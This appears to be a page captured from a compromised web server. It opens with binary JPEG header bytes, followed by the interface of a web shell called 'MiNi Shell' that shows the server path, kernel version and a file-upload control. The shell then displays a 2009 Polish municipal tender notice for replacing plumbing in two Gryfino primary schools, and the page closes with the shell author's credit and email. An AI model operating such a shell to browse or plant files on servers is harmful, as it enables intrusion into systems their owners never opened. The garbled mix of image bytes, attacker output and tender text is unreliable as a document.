JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/124030-N-2009.html

<p class="kh_header"><b>Gryfino: Wymiana instalacji wodociągowej i kanalizacyjnej  w Szkole Podstawowej Nr 1 w Gryfinie przy ul. Łużyckiej 22 oraz w Szkole Podstawowej Nr 2 w Gryfinie przy ul. 9 Maja 4.</b><br>
<b>Numer ogłoszenia: 124030 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino , ul. 1 Maja 16, 74-100 Gryfino, woj. zachodniopomorskie, tel. 091 4162011, faks 091 4162702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gryfino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana instalacji wodociągowej i kanalizacyjnej  w Szkole Podstawowej Nr 1 w Gryfinie przy ul. Łużyckiej 22 oraz w Szkole Podstawowej Nr 2 w Gryfinie przy ul. 9 Maja 4..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
a) Zadanie I
Wymiana instalacji wodociągowej i kanalizacyjnej w Szkole Podstawowej Nr 1          w Gryfinie przy ul. Łużyckiej 22, obejmujący:
-	demontaż istniejącej instalacji wody ciepłej i zimnej z rur stalowych o średnicy O15÷50 - ok. 878 mb,
-	montaż instalacji wodociągowej z rur z tworzyw sztucznych O15÷50 - ok. 1104 mb, 
-	montaż instalacji wodociągowej do celów ppoż. z rur stalowych ocynkowanych O25÷40 - ok. 65 mb,   
-	demontaż istniejącej instalacji kanalizacji sanitarnej z rur żeliwnych O50÷100 - ok. 458 mb,   
-	montaż instalacji kanalizacji sanitarnej z rur PVC - O50÷160 - ok. 626 mb
-	roboty budowlane po montażu w/w instalacji.

b) Zadanie II
Wymiana instalacji wodociągowej i kanalizacyjnej w Szkole Podstawowej Nr 2           w Gryfinie przy ul. 9 Maja 4, obejmujący:
-	demontaż istniejącej instalacji wody ciepłej i zimnej z rur stalowych o średnicy O15÷50 - ok. 616 mb, 
-	montaż instalacji wodociągowej z rur z tworzyw sztucznych O15÷50 - ok. 528 mb, 
-	montaż instalacji wodociągowej do celów ppoż. z rur stalowych ocynkowanych O25÷50 - ok. 103 mb,   
-	demontaż istniejącej instalacji kanalizacji sanitarnej z rur żeliwnych O50÷100 - ok. 123 mb,   
-	montaż instalacji kanalizacji sanitarnej z rur PVC - O50÷200 - ok. 176 mb
-	roboty budowlane po montażu w/w instalacji.
2. W przypadku, gdy opis przedmiotu zamówienia wskazuje na konkretne produkty, materiały lub urządzenia z podaniem nazwy producenta lub innych oznaczeń konkretyzujących producenta, Zamawiający dopuszcza zaoferowanie przez wykonawców produktów, materiałów lub urządzeń równoważnych. Zmiana materiałów i urządzeń wymaga ponownego uzgodnienia Dokumentacji Projektowej z Zamawiającym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.33.22.00-5, 45.33.24.00-7, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o zamówienie publiczne jest wniesienie wadium w wysokości 4 000,00 PLN na każde zadanie (słownie: cztery tysiące zł). Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu o udzielenie zamówienia publicznego mogą uczestniczyć Wykonawcy, którzy:
1)	nie podlegają wykluczeniu na podstawie art. 24 ustawy,
2)	spełniają wymagania określone w art. 22 ust. 1 ustawy.
2.	Zamawiający oceni spełnienie powyższych wymagań poprzez szczegółową analizę dokumentów złożonych przez Wykonawców, a wymaganych na podstawie SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy, tj.:
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Wzór oświadczenia stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia.


2. Od Wykonawcy przystępującego do postępowania o udzielenie zamówienia publicznego wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów:
1)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub oświadczenia wykonawcy, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne,
3)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia. Wykonawca musi dysponować Kierownikiem budowy lub przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia Kierownika budowy. Osoba wyznaczona do pełnienia funkcji Kierownika budowy musi posiadać: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji sanitarnych. Na potwierdzenie spełniania warunku należy dołączyć dokumenty potwierdzające posiadanie wymaganych uprawnień budowlanych. 
Oprócz dokumentów potwierdzających posiadanie uprawnień, wskazana przez Wykonawcę osoba musi legitymować się zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa  - załącznik nr 3, 
4)	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający wymaga, aby Wykonawcy wykazali się:
zadanie nr 1 i nr 2 
zrealizowaniem jednej roboty budowlanej polegającej na wykonaniu wewnętrznych instalacji sanitarnych za minimum 150 000,00 zł. brutto. Do wykazu robót należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane z należytą starannością (np. referencje, protokoły odbioru)- załącznik nr 4,
5) informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek bankowy, potwierdzający wysokość środków finansowych lub zdolność kredytową o wysokości :
-  minimum 150 000,00 zł PLN (sto pięćdziesiąt tysięcy złotych) (wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) w przypadku składania ofert na dwa zadania,
-  minimum 75 000,00 zł PLN (siedemdziesiąt pięć tysięcy złotych) (wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) w przypadku składania oferty na jedno zadanie,
6)	polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę:
- nie mniejszą niż 200.000,00 zł PLN. (dwieście tysięcy złotych) w przypadku składania ofert na dwa zadania,
-  nie mniejszą niż 100.000,00 zł PLN (sto tysięcy złotych) w przypadku składania ofert na jedno zadanie.
3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa, w punktach: 1) i 2) - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.	Wszystkie dokumenty, zgodnie z obowiązującym w tym zakresie rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605) zmienionym rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym ww. rozporządzenie (Dz. U. Nr 188, poz. 1155), należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gryfino.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Gryfino
ul. 1 Maja 16
74-100 Gryfino
pok. 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy Gryfino
ul. 1 Maja 16
74-100 Gryfino
Biuro Obsługi Interesantów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana instalacji wodociągowej i kanalizacyjnej  
w Szkole Podstawowej Nr 1 w Gryfinie przy ul. Łużyckiej 22.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana instalacji wodociągowej i kanalizacyjnej w Szkole Podstawowej Nr 1          w Gryfinie przy ul. Łużyckiej 22, obejmująca:
-	demontaż istniejącej instalacji wody ciepłej i zimnej z rur stalowych o średnicy O15÷50 - ok. 878 mb,
-	montaż instalacji wodociągowej z rur z tworzyw sztucznych O15÷50 - ok. 1104 mb, 
-	montaż instalacji wodociągowej do celów ppoż. z rur stalowych ocynkowanych O25÷40 - ok. 65 mb,   
-	demontaż istniejącej instalacji kanalizacji sanitarnej z rur żeliwnych O50÷100 - ok. 458 mb,   
-	montaż instalacji kanalizacji sanitarnej z rur PVC - O50÷160 - ok. 626 mb
-	roboty budowlane po montażu w/w instalacji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.22.00-5, 45.33.24.00-7, 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana instalacji wodociągowej i kanalizacyjnej  
w Szkole Podstawowej Nr 2 w Gryfinie przy ul. 9 Maja 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana instalacji wodociągowej i kanalizacyjnej w Szkole Podstawowej Nr 2           w Gryfinie przy ul. 9 Maja 4, obejmująca:
-	demontaż istniejącej instalacji wody ciepłej i zimnej z rur stalowych o średnicy O15÷50 - ok. 616 mb, 
-	montaż instalacji wodociągowej z rur z tworzyw sztucznych O15÷50 - ok. 528 mb, 
-	montaż instalacji wodociągowej do celów ppoż. z rur stalowych ocynkowanych O25÷50 - ok. 103 mb,   
-	demontaż istniejącej instalacji kanalizacji sanitarnej z rur żeliwnych O50÷100 - ok. 123 mb,   
-	montaż instalacji kanalizacji sanitarnej z rur PVC - O50÷200 - ok. 176 mb
-	roboty budowlane po montażu w/w instalacji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.22.00-5, 45.33.24.00-7, 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com